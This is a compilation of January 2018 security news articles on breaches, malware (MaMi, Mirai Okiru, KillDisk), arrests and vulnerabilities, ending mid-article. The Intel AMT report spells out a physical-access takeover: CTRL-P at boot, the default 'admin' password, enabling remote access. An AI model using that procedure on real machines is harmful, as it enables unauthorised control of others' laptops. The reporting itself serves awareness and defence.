Canadian authorities have arrested and charged an Ontario man for operating a website that collected 'stolen' personal identity records and credentials from some three billion online accounts and sold them for profit.
According to the Royal Canadian Mounted Police (RCMP), the 27-year-old Jordan Evan Bloom of Thornhill is the person behind the notorious LeakedSource.com—a major repository that compiled public data breaches and sold access to the data, including plaintext passwords.
Launched in late 2015, LeakedSource had collected around 3 billion personal identity records and associated passwords from some of the massive data breaches, including LinkedIn, VK.com, Last.Fm, Ashley Madison, MySpace, Twitter, Weebly and Foursquare, and made them accessible and searchable to anyone for a fee.
LeakedSource was shut down, and its associated social media accounts have been suspended after the law enforcement raided its operator earlier last year.
However, another website with the same domain name hosted by servers in Russia is still in operation.
Bloom is accused of operating the notorious website and claimed to have earned nearly US$200,000 by selling stolen personal identity records and associated passwords for a "small fee" via his site.
Appeared in a Toronto court on Monday, January 15, Bloom charged with trafficking in identity information, mischief to data, unauthorised use of a computer, and possession of property obtained by crime, the RCMP said.
"This investigation is related to claims about a website operator alleged to have made hundreds of thousands of dollars selling personal information," the RCMP Cybercrime Investigative Team said in a statement.
"The RCMP will continue to work diligently with our domestic and international law enforcement partners to prosecute online criminality."
Bloom was arrested and charged on December 22, 2017, as part of the RCMP's national cybercrime division investigation, dubbed 'Project Adoration.'
The RCMP said the Dutch national police and the United States' FBI assisted in the operation, adding the case could not have been cracked without international collaboration.
Bloom is currently in custody and due back in court on February 16.
Cybersecurity lawyer Imran Ahmad told Reuters that Bloom could face a maximum sentence 10 years in prison.


New Intel AMT Security Issue Lets Hackers Gain Full Control of Laptops in 30 Seconds

17.1.2018 thehackernews Attack

It's been a terrible new-year-starting for Intel.
Researchers warn of a new attack which can be carried out in less than 30 seconds and potentially affects millions of laptops globally.
As Intel was rushing to roll out patches for Meltdown and Spectre vulnerabilities, security researchers have discovered a new critical security flaw in Intel hardware that could allow hackers to access corporate laptops remotely.
Finnish cyber security firm F-Secure reported unsafe and misleading default behaviour within Intel Active Management Technology (AMT) that could allow an attacker to bypass login processes and take complete control over a user's device in less than 30 seconds.
AMT is a feature that comes with Intel-based chipsets to enhance the ability of IT administrators and managed service providers for better controlling their device fleets, allowing them to remotely manage and repair PCs, workstations, and servers in their organisation.
The bug allows anyone with physical access to the affected laptop to bypass the need to enter login credentials—including user, BIOS and BitLocker passwords and TPM pin codes—enabling remote administration for post-exploitation.
In general, setting a BIOS password prevents an unauthorised user from booting up the device or making changes to the boot-up process. But this is not the case here.
The password doesn't prevent unauthorised access to the AMT BIOS extension, thus allowing attackers access to configure AMT and making remote exploitation possible.
Although researchers have discovered some severe AMT vulnerabilities in the past, the recently discovered issue is of particular concern because it is:
easy to exploit without a single line of code,
affects most Intel corporate laptops, and
could enable attackers to gain remote access to the affected system for later exploitation.
"The attack is almost deceptively simple to enact, but it has incredible destructive potential," said F-Secure senior security researcher Harry Sintonen, who discovered the issue in July last year.
"In practice, it can give a local attacker complete control over an individual’s work laptop, despite even the most extensive security measures."
According to the researchers, the newly discovered bug has nothing to do with the Spectre and Meltdown vulnerabilities recently found in the microchips used in almost all PCs, laptops, smartphones and tablets today.

To exploit this issue, all an attacker with physical access to a password (login and BIOS) protected machine needs to do is reboot or power-up the targeted PC and press CTRL-P during boot-up, as demonstrated by researchers at F-Secure in the above video.
The attacker then can log into Intel Management Engine BIOS Extension (MEBx) with a default password.
Here, the default password for MEBx is "admin," which most likely remains unchanged on most corporate laptops.
Once logged in, the attacker can then change the default password and enable remote access, and even set AMT's user opt-in to "None."
Now, since the attacker has backdoored the machine efficiently, he/she can access the system remotely by connecting to the same wireless or wired network as the victim.
Although exploiting the issue requires physical access, Sintonen explained that the speed and time at which it can be carried out makes it easily exploitable, adding that even one minute of a distraction of a target from its laptop is enough to do the damage.
"Attackers have identified and located a target they wish to exploit. They approach the target in a public place—an airport, a café or a hotel lobby—and engage in an 'evil maid' scenario," Sintonen says.
"Essentially, one attacker distracts the mark, while the other briefly gains access to his or her laptop. The attack doesn't require a lot of time—the whole operation can take well under a minute to complete."
Along with CERT-Coordination Center in the United States, F-Secure has notified Intel and all relevant device manufacturers about the security issue and urged them to address it urgently.
Meanwhile, users and IT administrators in an organisation are recommended to change the default AMT password of their device to a strong one or disable AMT if this option is available, and never leave their laptop or PC unattended in a public place.


Skype Finally Adds End-to-End Encryption for Private Conversations

17.1.2018 thehackernews Social

Good news for Skype users who are concerned about their privacy.
Microsoft is collaborating with popular encrypted communication company Signal to bring end-to-end encryption support to Skype messenger.
End-to-end encryption assured its users that no one, not even the company or server that transmits the data, can decrypt their messages.
Signal Protocol is an open source cryptographic protocol that has become an industry-wide standard—which is used in Facebook Messenger, Whatsapp, and Google Allo for secure messaging.
Dubbed Private Conversations, the new feature which is about to be introduced in Skype will offer end-to-end encryption for audio calls, text, and multimedia messages like videos and audio files.
"Skype Private Conversations give you enhanced security through end-to-end encryption with an additional layer of security for conversations between you and your friends and family," the company announced.
"Private Conversations can only be between you and one other contact. This is not supported in groups."
How to Start Skype End-to-End Encrypted Calls and Chats
Private Conversations is already available to the Skype Insider program—a platform that allows Skype users to test new features before they rolled out to the rest of its over 300 million of users worldwide.
To initiate a new secure communication with your Skype contact, you need to tap or click on the (+) icon, select 'New Private Conversation' and then select the contact you would like to start the secure communication with.
A Private Conversation will have a lock icon next to your Skype contact's name. Preview messages from Private Conversations will not appear in the chat list or notifications.
Unlike WhatsApp, end-to-end encryption feature is not enabled by default in Skype and users need to select 'New Private Conversation' from the app's "Compose" menu, or from another user's profile to initiate a secure communication—it's like Facebook Messenger's Secret Conversations, which is also based on of Signal.
Unfortunately, Private Conversations also doesn't currently support video calling, but this is secured by the standard encryption that Microsoft already provides with its Skype service.
Also, even with Private Conversations enabled, Skype will still be able to access some information (metadata) about your secure communications, like when you initiate them, and how long the conversation last.
Skype Insider users can test Private Conversations using Skype build version 8.13.76.8 for iOS, Android, Linux, Mac, and Windows Desktop.


How to hack Facebook accounts exploiting CSRF in Oculus app
17.1.2018 securityaffairs
Social

Facebook has fixed a couple of vulnerabilities that could have been exploited by attackers to hijack accounts by abusing integration with the Oculus virtual reality headset.
In March 2014, Facebook founder Mark Zuckerberg announced the acquisition of Oculus VR and included the handsets produced by the company to its bug bounty program.

White hat hackers discovered several vulnerabilities in Oculus platform since, including the ones addressed now by Facebook.

The flaws were reported in October by the security consultant Josip Franjkoviæ who analyzed the Oculus application for Windows.

“Oculus enables users to connect their Facebook accounts for a more “social” experience. This can be done using both the native Windows Oculus application and using browsers.” wrote Franjkoviæ. “I took a deeper look at the native Windows flow, and found a CSRF vulnerability which allowed me to connect a victim’s Facebook account to attacker’s Oculus account. Once connected, the attacker could extract the victim’s access token, and use Facebook’s GraphQL queries to take over the account.”

Facebook%20oculus%20

One of the features implemented by the Oculus application is the authentication to a Facebook account, Franjkovic discovered that attackers could have exploited specially crafted GraphQL queries to connect any user’s Facebook account to their Oculus account.

GraphQL is a query language created by Facebook in 2012 for describing the capabilities and requirements of data models for client‐server applications, a GraphQL query is a string that is sent to a server to be interpreted and fulfilled, which then returns JSON back to the client.

Franjkovic discovered that a specially crafted query allowed an attacker to obtain the victim’s access token and use it to impersonate the victim by accessing his account.

In a proof of concept attack, Franjkovic shows how to use a specially crafted query to add a new mobile phone number to the targeted account and use it to reset the victim’s password.

The vulnerability was reported to Facebook on October 24, the social network giant temporary solved the issue by disabling the facebook_login_sso endpoint.

On October 30, Facebook rolled out a patch to address definitively the problem, but a few weeks later, the expert discovered a login cross-site request forgery (CSRF) flaw that could have been exploited to bypass Facebook’s patch.

The experts informed Facebook on November 18 that disabled again the facebook_login_sso endpoint to mitigate the problem. A complete patch was rolled out after a few weeks.

Facebook paid the expert for his discoveries and classified the vulnerabilities as critical.

Step by step procedure exploited by the researcher is described on its blog, below the timeline of the hack:

24th of October, 2017, 03:20 – Report sent to Facebook
24th of October, 2017, 10:50 – First reply from Facebook
24th of October, 2017, 11:30 – Temporary fix for the bug (disabled /facebook_login_sso/ endpoint)
30th of October, 2017 – Bug is now fixed.


Game of Drones – Researchers devised a technique to detect drone surveillance
17.1.2018 securityaffairs IT

A group of Israeli researchers at Ben Gurion University have built a proof-of-concept system against surveillance operated a surveillance drone.
Drones have created a new threat to people’s privacy. Anyone with a drone equipped with a video camera can potentially violate our privacy by streaming the subject in his/her private space over an encrypted first person view (FPV) channel.

Experts suggested many methods to detect nearby drones, but they all suffer from the same shortcoming: they cannot identify exactly what is being captured, and therefore they fail to distinguish between the legitimate use of a drone (for example, to use a drone to film a selfie from the air) and illegitimate use that invades someone’s privacy (when the same operator uses the drone to stream the view into the window of his neighbor’s apartment), a distinction that in some cases depends on the orientation of the drone’s video camera rather than on the drone’s location.

A group of Israeli researchers at Ben Gurion University in Beer Sheva (Ben Nassi, Raz Ben-Netanel, Adi Shamir, Yuval Elovici) have built a proof-of-concept system against surveillance operated with spying drones that is able to determine whether a certain person or object is under drone surveillance.

The system first generates a recognizable pattern on whatever subject someone might want to guard spy on with aerial surveillance, then researchers remotely intercept a drone’s radio signals and scan the streaming video the drone sends to the operator scanning for that pattern.

“In this paper, we shatter the commonly held belief that the use of encryption to secure an FPV channel prevents an interceptor from extracting the POI that is being streamed. We show methods that leverage physical stimuli to detect whether the drone’s camera is directed towards a target in real time.” wrote the researchers,

“We investigate the influence of changing pixels on the FPV channel (in a lab setup). Based on our observations we demonstrate how an interceptor can perform a side-channel attack to detect whether a target is being streamed by analyzing the encrypted FPV channel that is transmitted from a real drone (DJI Mavic) in two use cases: when the target is a private house and when the target is a subject.”
The experts leverage the “delta frames” technique, instead of encoding video as a series of raw images, it’s compressed into a series of changes from the previous image in the video. A streaming video related to a still object contains fewer bytes of data compared with a streaming video of an object in motion or images that continuously change color.

That compression feature can reveal key information about the content of the video to someone who’s intercepting the streaming data, the technique works even when data is encrypted.

The Ben Gurion researchers used in the tests a “smart film” to toggle the opacity of several panes of a house’s windows. They used a DJI Mavic quadcopter to spy on the house, they demonstrated that the technique was able to detect the changing from opaque to transparent and back again of the panes. Then they used a parabolic antenna and a laptop to intercept the drone’s radio signals sent back to the operator and search the pattern in the encrypted data stream to detect if the UAV was used for aerial surveillance of the house.

drone%20surveillance

“In another test, they put blinking LED lights on a test subject’s shirt, and then were able to pull out the binary code for “SOS” from an encrypted video focused on the person, showing that they could even potentially “watermark” a drone’s video feed to prove that it spied on a specific person or building.” reported Wired.

But Nassi confirmed that their technique works at ranges where it’s very difficult to spot a surveillance drone in the sky, the researchers tested their technique from a range of about 150 feet. The range is scalable by using a more powerful antenna.


Mobile App Flaws of SCADA ICS Systems Could Allow Hackers To Target Critical Infrastructe
17.1.2018 securityaffairs ICS

IOACTIVE researchers warn that critical infrastructure mobile applications are being developed without secure coding compliance that could allow hackers to target SCADA Systems.
In a report released today, by IOACTIVE, researchers’ advice that critical infrastructure mobile applications are being developed without secure coding compliance that could allow hackers to target Supervisory Control and Data Acquisition Industrial Control Systems.

SCADA-ICS stands for Supervisory Control and Data Acquisition Industrial Control System, that represents the industrial automated systems operating on critical infrastructure. These systems are responsible for the control and operation of critical services like clean water and energy respectively. Researchers of IOACTIVE released a report analyzing the impact on the security of SCADA-ICS systems operating connected to the internet of things (IoT) and mobile applications.

The report states that mobile applications are present in many ICS segments and can be divided into two groups, Local (Wi-Fi, Bluetooth) and remote applications (Internet, VPN), which are exposed to three types of attacks such as Unauthorized physical access to the device or “virtual” access to device data, Communication channel compromise (MiTM), Application compromise.

SCADA-ICS%20infrastructure

Considering these attacks mobile SCADA applications can lead to Directly/indirectly influencing an industrial process or industrial network infrastructure and compromising an operator to unwillingly perform a harmful action on the system.

The research was conducted based on OWASP 2016 and analyzed 34 vendors that released the app on Google Play Store. The mobile app analyzed revealed that 147 security issues were identified related to secure coding programming that would allow code tampering.

The researchers noticed that hackers could gain remote control to smartphones to further launch attacks on ICS vulnerable app used on hardware and software. Also, the researchers pointed out that there was an increase of 16 vulnerabilities per application.

Regarding the vulnerabilities, researchers found out that insecure authorization was present with some apps failing to include any form of authentication. Other vulnerabilities live reverse engineering were present due to the absence of code obfuscation. insecure data storage and unintended data leakage were present which could allow hackers to access the app or data related to ‘Supervisory Control And Data Acquisition’ system.

The security of society is at stake since these new vulnerabilities pose a great threat, even more than the damage caused by the 2016 Ukrainian attack. The report recommends to app developers to consider secure coding in the development planning due to the impacts on society that these flaws represent.


New MaMi Malware targets macOS systems and changes DNS settings
17.1.2018 securityaffairs Apple

The popular security researcher Patrick Wardle spotted MaMi malware, a new threat malware designed to hijack DNS settings on macOS devices.
The cyber security expert and former NSA hacker Patrick Wardle made the headline once again, this time the researcher has spotted a new strain of malware dubbed MaMi designed to hijack DNS settings on macOS devices.

Wardle first obtained a sample of the MaMi malware after a user reported on the Malwarebytes forums that the Mac of its teacher was infected by a malware that set DNS servers to 82.163.143.135 and 82.163.142.137.

MAMI%20Malware

At the time of its discovery, it was undetected by all engines on VirusTotal. The OSX/MaMi isn’t particularly advanced, but the researcher remarked that it does alter infected systems in rather nasty and persistent ways.

“Since there are already several (IMHO unrelated) malware specimens that perform DNS hijackering (that are named ‘DNSChanger’, etc), I decided to call is OSX/MaMi due to a core class the malware named: ‘SBMaMiSettings’ ” wrote Wardle.

“Ok, that’s a wrap. OSX/MaMi isn’t particular advanced – but does alter infected systems in rather nasty and persistent ways. By installing a new root certificate and hijacking the DNS servers, the attackers can perform a variety of nefarious actions such as man-in-the-middle’ing traffic (perhaps to steal credentials, or inject ads). “

The malicious code acts as a DNS hijacker, but it also implements other features for taking screenshots, simulating mouse events, downloading and uploading files, and executing commands.

The researcher discovered the malware on several websites, unfortunately, it was not able to determine the distribution channel. It is likely the MaMi malware has been delivered via email, fake security alerts and pop-ups on websites, or social engineering attacks.

Wardle noticed that the malware does not appear to execute any of implement feature, likely because it requires some attacker-supplied input or other preconditions that were not simulated in the virtualized test lab used by the expert.

Once MaMi has infected a mac system, it invokes the security tool and uses it to install a new certificate (dcdata.bin) it’s downloaded from the internet.

“By installing a new root certificate and hijacking the DNS servers, the attackers can perform a variety of nefarious actions such as man-in-the-middle’ing traffic (perhaps to steal credentials, or inject ads).” explained Wardle.

How to discover is a macOS system is infected with the MaMi malware?

Users can check DNS settings, the malicious code set DNS servers to 82.163.143.135 and 82.163.142.137.

Patrick Wardle also created a free open-source firewall for macOS named ‘LuLu,’ which is able to block suspicious traffic and neutralize OSX/MaMi’s.

MaMi isn’t only one of the DNS-changer malware discovered since today, the most popular malware with these characteristics is DNSChanger, a threat that targeted both Windows and OS X machines, infecting millions of devices worldwide.


Fappening – A fourth man has been charged with hacking into over 250 Apple iCloud accounts belonging to celebrities
17.1.2018 securityaffairs Apple

Fappening – A fourth hacker, George Garofano (26), of North Branford, has been charged with hacking into over 250 Apple iCloud accounts belonging to celebrities.
A fourth hacker, George Garofano (26), of North Branford, has been charged with hacking into over 250 Apple iCloud accounts belonging to celebrities.

Garofano had been arrested by the FBI and a federal court has accused him of violating the Computer Fraud and Abuse Act.

From April 2013 through October 2014, Garofano used phishing attacks against the victims to obtain their iCloud accounts credentials, access the accounts and steal personal information, including private photographs and videos.

“According to the plea agreement, from April 2013 through October 2014, Garofano engaged in a phishing scheme to obtain usernames and passwords for iCloud accounts. Garofano admitted that he sent e-mails to victims that appeared to be from security accounts of Apple and encouraged the victims to send him their usernames and passwords, or to enter them on a third-party website, where he would later retrieve them.” reads the press release published by the DoJ.

“Garofano used the usernames and passwords to illegally access his victims’ iCloud accounts, which allowed him to steal personal information, including sensitive and private photographs and videos, according to his plea agreement. In some instances, Garofano traded the usernames and passwords, as well as the materials he stole from the victims, with other individuals.”

As part of the Fappening case, nude pictures of many celebrities were leaked online, the list of victims is long and includes Kim Kardashian, Kate Upton, and Jennifer Lawrence.

Garofano also traded the stolen credentials, as well as the information he stole from the victims’ accounts, with other individuals.

In a plea agreement signed last week in U.S. District Court in Los Angeles, Garofano agreed to plead guilty to one count of unauthorized access to a protected computer to obtain information.

The man is now facing up to 5 years in federal prison.

fappening

Garofano is the fourth man charged in connection with the Fappening saga, in past months Emilio Herrera, Edward Majerczyk, Ryan Collins, pleaded guilty to being involved in the attacks on the celebrities’ iCloud accounts.

Collins was sentenced to 18 months in federal prison, Majerczyk to nine months and Herrera is waiting for sentencing next month.


Lenovo spotted and fixed a backdoor in RackSwitch and BladeCenter networking switches
17.1.2018 securityaffairs
Vulnerebility

Lenovo discovered a firmware backdoor in RackSwitch and BladeCenter networking switch families during an internal security audit.
Security experts at Levono have spotted a firmware backdoor, tracked CVE-2017-3765, in RackSwitch and BladeCenter networking switch families during an internal security audit.

An authentication bypass affects only in RackSwitch and BladeCenter switches running ENOS (Enterprise Network Operating System), the tech giant promptly addressed it with firmware updates last week.

The Enterprise Network Operating System (ENOS) is the firmware that powers some Lenovo and IBM RackSwitch and BladeCenter switches.

According to the security advisory published by Lenovo, the backdoor (dubbed “HP backdoor”) was added to ENOS in 2004 when ENOS was owned by Nortel’s Blade Server Switch Business Unit.

The backdoor was intentionally inserted by Nortel that added it at the request of a BSSBU OEM customer.

“An authentication bypass mechanism known as “HP Backdoor” was discovered during a Lenovo security audit in the Telnet and Serial Console management interfaces, as well as the SSH and Web management interfaces under certain limited and unlikely conditions.” states the security advisory.

“A source code revision history audit revealed that this authentication bypass mechanism was added in 2004 when ENOS was owned by Nortel’s Blade Server Switch Business Unit (BSSBU). The mechanism was authorized by Nortel and added at the request of a BSSBU OEM customer.”

The backdoor was never removed from the firmware even after three acquisitions of the unit. Nortel spun BSSBU off in 2006 as BLADE Network Technologies (BNT), IBM acquired BNT in 2010, and Lenovo bought IBM’s BNT portfolio in 2014 … but the HP backdoor was never removed.

This bypass mechanism can be accessed when performing local authentication under specific circumstances using credentials that are unique to each switch. the exploitation of the backdoor could grant the attacker admin-level access.

Below the list of ENOS interfaces and authentication configurations affected by the issue:

Telnet and Serial Console when performing local authentication, or a combination of RADIUS, TACACS+, or LDAP and local authentication under specific circumstances described below
Web when performing a combination of RADIUS or TACACS+ and local authentication combined with an unlikely condition under specific circumstances described below
SSH for certain firmware released in May 2004 through June 2004 (only) when performing a combination of RADIUS or TACACS+ and local authentication under specific circumstances described below; the vulnerable code is present in more recent firmware, but not used
Lenovo%20backdoor

Lenovo has provided the firmware source code to a third-party security partner to enable independent investigation of the issue, the company declined any responsibility and expressed its disappointment for the presence of the backdoor:

“The existence of mechanisms that bypass authentication or authorization are unacceptable to Lenovo and do not follow Lenovo product security or industry practices. Lenovo has removed this mechanism from the ENOS source code and has released updated firmware for affected products.” continues the advisory

“Lenovo is not aware of this mechanism being exploited, but we assume that its existence is known, and customers are advised to upgrade to firmware which eliminates it.”

Lenovo released firmware updates for both newer and older (IBM-branded) RackSwitch and BladeCenter networking switch families.

The full list of impacted switches and associated links for the latest firmware were included in the advisory.

Lenovo confirmed that the backdoor doesn’t affect the switches running CNOS (Cloud Network Operating System).


Mirai Okiru botnet targets for first time ever in the history ARC-based IoT devices
17.1.2018 securityaffairs BotNet

Researcher @unixfreaxjp spotted the first time ever in the history of computer engineering a Linux malware designed to infect ARC CPU, this new Linux ELF malware was dubbed MIRAI OKIRU.
In August 2016 the researcher @unixfreaxjp from @MalwareMustDie team first spotted the dreaded Mirai botnet, now the same researcher is announcing a new big earthquake in the malware community.

unixfreaxjp spotted the first time ever in the history of computer engineering a Linux malware designed to infect ARC CPU, this new Linux ELF malware was dubbed MIRAI OKIRU.

This is the first time that a malware specifically targets ARC-based systems, the Mirai Okiru was undetected by almost all the antivirus engines at the time of its discovery.

Mirai%20ARC%20OKIRU

“!! Please be noted of this fact, and be ready for the bigger impact on infection Mirai (specially Okiru) to devices that hasn’t been infected yet.” said #MalwareMustDie

The Linux IoT threat landscape is rapidly changing, crooks will start targeting IoT devices based on ARC CPU.

“From this day, the landscape of #Linux #IoT infection will change. #ARC cpu has produced #IoT dervices more than 1 billion per year. So these devices are what the hackers want to aim to infect #ELF #malware with their #DDoS cannons. It’s a serious threat will be. #MalwareMustDie!” wrote MMD.

As highlighted by the colleague the impact of such botnet could be devastating, it has been estimated that ARC embedded processors are shipped in more than 1.5 billion products per year. This means that the number of the potentially exposed devices is enormous, and a so powerful botnet could be used for a multitude of malicious purposes.

“ARC (Argonaut RISC Core) embedded processors are a family of 32-bit CPUs originally designed by ARC International. They are widely used in SoC devices for storage, home, mobile, automotive, and Internet of Things applications. ARC processors have been licensed by more than 200 organizations and are shipped in more than 1.5 billion products per year.” reads Wikipedia.

View image on TwitterView image on Twitter


@_odisseus
This is the FIRST TIME ever in the history of computer engineering that there is a malware for ARC CPU, & it is #MIRAI OKIRU!!
Pls be noted of this fact, & be ready for the bigger impact on infection Mirai (specially #Okiru) to devices hasn't been infected yet.#MalwareMustDie

9:40 PM - Jan 14, 2018
13 13 Replies 324 324 Retweets 295 295 likes
Twitter Ads info and privacy
“#Mirai #Okiru variant is very dangerous, if you see how the coder made specific “innovative modification” in its variant codes+encryption you’ll see what I mean, & now they are the 1st malware to aim #ARC core. These guys can make greater chaos if not be stopped. Mark my word” wrote MalwareMustDie.

It is very important to understand that the Mirai Satori variant is very different from Okiru as explained by MalwareDustdie.

“From what we observe so far. these two types are very different, (among of several common similar characteristic), we think it is good to have different rules to detect Mirai variant Okiru and Satori
Some simple highlights to differ Okiru to Satori variant:
The config is different, Okiru variant’s config is encrypted in two parts w/ telnet bombardment password encrypted, Satori does not split it in 2parts and doesn’t encrypt brute default passwords. Also Okiru’s telnet attack login information is a bit longer (can be up to 114 credentials, max counted), while Satori is having different and shorter database.
Satori seem to have “TSource Engine Query” common Distributed “Reflective” (DRDoS) attack function via random UDP, while Okiru does not seem to have this function,
The infection follow up commands written in both Okiru and Satori in their configurations are a bit different, showing possibility that they don’t seem sharing a same “herding environment”,
(up to) Four types of router attack exploit code has only being spotted hard coded in Okiru variant, yet Satori does not use these exploits at all,
Satori (see VT comment part for reversed code) is using small embedded ELF trojan downloaders to download other architecture binaries which were coded differently compared to Okiru ones (see reversed code is in VT comment),
(there are more minors stuff too that you can notice using the pictures shown in previous points, like differences in usage of watchdog, the usage of command “echo -en \x…” etc)
” wrote MalwareMustDie.

ARC Core CPU base compiled Mirai Okiru ELF malware (botnet client) (ELF 32-bit LSB executable, ARC Cores Tangent-A5, version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, for GNU/Linux 4.8.0, stripped).
The risk that someone could build a powerful Mirai Okiru botnet composed of a billion device is concrete.

Researchers from MalwareMustDie published the Yara rules for the threat

https://github.com/unixfreaxjp/rules/blob/master/malware/MALW_Mirai_Okiru_ELF.yar

and IoCs:

MD5: 9c677dd17279a43325556ec5662feba0
MD5: 24fc15a4672680d92af7edb2c3b2e957


Blackwallet hacked, hackers stole $400,000 from users’ accounts through DNS hijacking
17.1.2018 securityaffairs Hacking

BlackWallet.co was victims of a DNS hijacking attack, on January 13 the attackers have stolen over $400,000 from users’ accounts (roughly 670,000 Lumens).
The spike in cryptocurrency values is attracting cybercriminals, the last victim is the BlackWallet.co a web-based wallet application for the Stellar Lumen cryptocurrency (XLM).

The platform was victims of a DNS hijacking attack, on January 13 the attackers have stolen over $400,000 from users’ accounts (roughly 670,000 Lumens).

According to Bleeping Computer, the attackers collected 669,920 Lumens, which is about $400,192 at the current XML/USD exchange rate.

Stellar Lumen today is considered as the eight most popular cryptocurrency.

The attackers hijacked the DNS entry of the BlackWallet.co domain and redirected it to a server they operated, as result of the attack, the application suspended its service.

Technically users were logging to the bogus domain entering their credentials, then the attackers used them to access the account and steal the funds.



Kevin Beaumont

@GossiTheDog
Blackwallet (web wallet) has apparently been hacked

2:51 AM - Jan 14, 2018
5 5 Replies 98 98 Retweets 83 83 likes
Twitter Ads info and privacy
14 Jan

Kevin Beaumont

@GossiTheDog
Blackwallet (web wallet) has apparently been hacked pic.twitter.com/HhewwBXnD9


Kevin Beaumont

@GossiTheDog
The DNS hijack of Blackwallet injected code, if you had over 20 Lumens it pushes them to a different wallet. pic.twitter.com/Eiwb8UR1Nn

2:58 AM - Jan 14, 2018
View image on Twitter
4 4 Replies 32 32 Retweets 34 34 likes
View%20image%20on%20Twitter

Well I know now why XLM is dipping

Blackwallet got hacked and the worst part was that I laughed my ass off when reading the reddit…their misery is my gain and for a moment, I felt nothing but joy.

Okay maybe there's something wrong with me.

— Colton Miles (@Omgflamethrower) January 14, 2018

Users on Reddit and other communities promptly spread the news of the hack.

The attackers immediately started moving funds from the XLM account to Bittrex, a cryptocurrency exchange, in the attempt to launder them by converting in other digital currency.

blackwallet%20hacked

The situation is critical, admins are asking Bittrex to block the attackers’ operations before is too late.

“I am the creator of Blackwallet. Blackwallet was compromised today, after someone accessed my hosting provider account. He then changed the dns settings to those of its fraudulent website (which was a copy of blackwallet).” the Blackwallet creator wrote on Reddit.

“Hacker wallet is: https://stellarchain.io/address/GBH4TZYZ4IRCPO44CBOLFUHULU2WGALXTAVESQA6432MBJMABBB4GIYI

I’ve contacted both SDF and Bittrex to ask them to block the bittrex’s account of the hacker. I’ve contacted my hosting provider to disable my account and my websites.

Hacker sent the funds to a bittrex account. This might lead to an identity.”


orbit84
@orbit0x54
Hello @BittrexExchange , please block the account with MEMO XLM 27f9a3e4d954449da04, he hacked https://blackwallet.co/ and is now sending all the funds to your exchange! This is URGENT! A lot of money is involved (>$300,000) https://stellarchain.io/address/GBH4TZYZ4IRCPO44CBOLFUHULU2WGALXTAVESQA6432MBJMABBB4GIYI … https://www.reddit.com/r/Stellar/comments/7q72pw/warning_blackwalletco_hacked_check_your_public_key/?sort=new …

3:35 AM - Jan 14, 2018
11 11 Replies 108 108 Retweets 63 63 likes
Twitter Ads info and privacy
According to the BlackWallet admin, the incident took place after someone accessed his hosting provider account.

The creator of the web-based wallet application is trying to collect more info about the hack from his hosting provider.

“If you ever entered your key on blackwallet, you may want to move your funds to a new wallet using the stellar account viewer,” he added. “Please note however that blackwallet was only an account viewer and that no keys were stored on the server!” he added in the statement.

In December, the popular cryptocurrency exchange EtherDelta suffered a similar incident, attackers conducted a DNS attack that allowed to steal at least 308 ETH ($266,789) as well as a large number of tokens.


Spectre/Meltdown patches had a significant impact on SolarWinds’s AWS infrastructure
17.1.2018 securityaffairs IT

Analysis conducted by SolarWinds on the impact on the performance of the Spectre/Meltdown patches on its own Amazon Web Services infrastructure revealed serious performance degradation.
SolarWinds, the vendor of IT Management Software & Monitoring Tools, has analyzed the impact on the performance of Meltdown and Spectre security patches on its own Amazon Web Services infrastructure.

The results are disconcerting, the company has graphically represented the performance of “a Python worker service tier” on paravirtualized AWS instances.

The CPU usage jumped up to roughly 25% just after Amazon restarted the PV instance used by the company.

“As you can see from the following chart taken from a Python worker service tier, when we rebooted our PV instances on Dec 20th ahead of the maintenance date, we saw CPU jumps of roughly 25%.” states the analysis published by SolarWinds.

The company also monitored the performance of its EC2 instances noticing a degradation while Amazon was rolling out the Meltdown patches.

“AWS was able to live patch HVM instances with the Meltdown mitigation patches without requiring instance reboots. From what we observed, these patches started rolling out about Jan 4th, 00:00 UTC in us-east-1 and completed around 20:00 UTC for EC2 HVM instances in us-east-1. ” continues the analysis.

“CPU bumps like this were noticeable across several different service tiers:”

Summarizing, the packet rate drops up to 40% on its Kafka cluster, while CPU utilization spiked by around 25 percent on Cassandra.

The deployment of the patches had also some positive effects, CPU utilization rates decreased. The company issued an update on Jan 12, 2018.

“As of 10:00 UTC this morning we are noticing a step reduction in CPU usage across our instances. It is unclear if there are additional patches being rolled out, but CPU levels appear to be returning to pre-HVM patch levels.” states the firm.

Mike Heffner
@mheffner
New EC2 hot patches for Meltdown/Spectre rolling out? Previous CPU bumps appear to be dropping off starting after 10:00 UTC this morning.

3:06 PM - Jan 12, 2018
1 1 Reply 10 10 Retweets 22 22 likes


New KillDisk variant targets Windows machines in financial organizations in Latin America
17.1.2018 securityaffairs
Virus

A new variant of the infamous disk-wiper malware KillDisk has been spotted by malware researchers at Trend Micro while targeting financial organizations in Latin America.
A new variant of the infamous disk-wiper malware KillDisk has been spotted by malware researchers at Trend Micro. This variant of KillDisk, tracked as TROJ_KILLDISK.IUB, was involved in cyber attacks against financial organizations in Latin America, it is delivered by a different piece of malware or it may be part of a bigger attack.

“We came across a new variant of the disk-wiping KillDisk targeting financial organizations in Latin America.” reads a preliminary analysis published by TrendMicro.

“Because KillDisk overwrites and deletes files (and doesn’t store the encryption keys on disk or online), recovering the scrambled files was out of the question.”

KillDisk and the ICS-SCADA malware BlackEnergy, were used in the attacks that caused the power outage in Ukraine in December 2015.

It was used in the same period also against mining companies, railways, and banks in Ukraine. The malware was later included in other malicious codes, including Petya.

In December 2016, researchers at security firm CyberX discovered a variant of the KillDisk malware that implemented ransomware features.

This latest variant targets Windows machines deleting any file stored on drives, except for system files and folders.

“The malware attempts to wipe \\.\PhysicalDrive0 to \\.\PhysicalDrive4. It reads the Master Boot Record (MBR) of every device it successfully opens and proceeds to overwrite the first 0x20 sectors of the device with “0x00”. It uses the information from the MBR to do further damage to the partitions it lists.” states Trend Micro. “If the partition it finds is not an extended one, it overwrites the first 0x10 and last sectors of the actual volume. If it finds an extended partition, it will overwrite the Extended Boot Record (EBR) along with the two extra partitions it points to.”

Once the malware has deleted and overwritten files and folders it attempts to terminate several processes to force the machine reboots.

The processed targeted by the malware are:

Client/server run-time subsystem (csrss.exe)
Windows Start-Up Application (wininit.exe)
Windows Logon Application (winlogon.exe)
Local Security Authority Subsystem Service (lsass.exe)
Trend Micro is still investigating this news KillDisk variant, meantime it is inviting companies to adopt a “defense in depth” approach securing the perimeters from gateways, endpoints, and networks to servers.


Customers reporting OnePlus payment website was hacked and reported credit card fraud
17.1.2018 securityaffairs Incindent

Several customers of the Chinese smartphone manufacturer. OnePlus claim to have been the victim of fraudulent credit card transactions after making purchases on the company webstore.
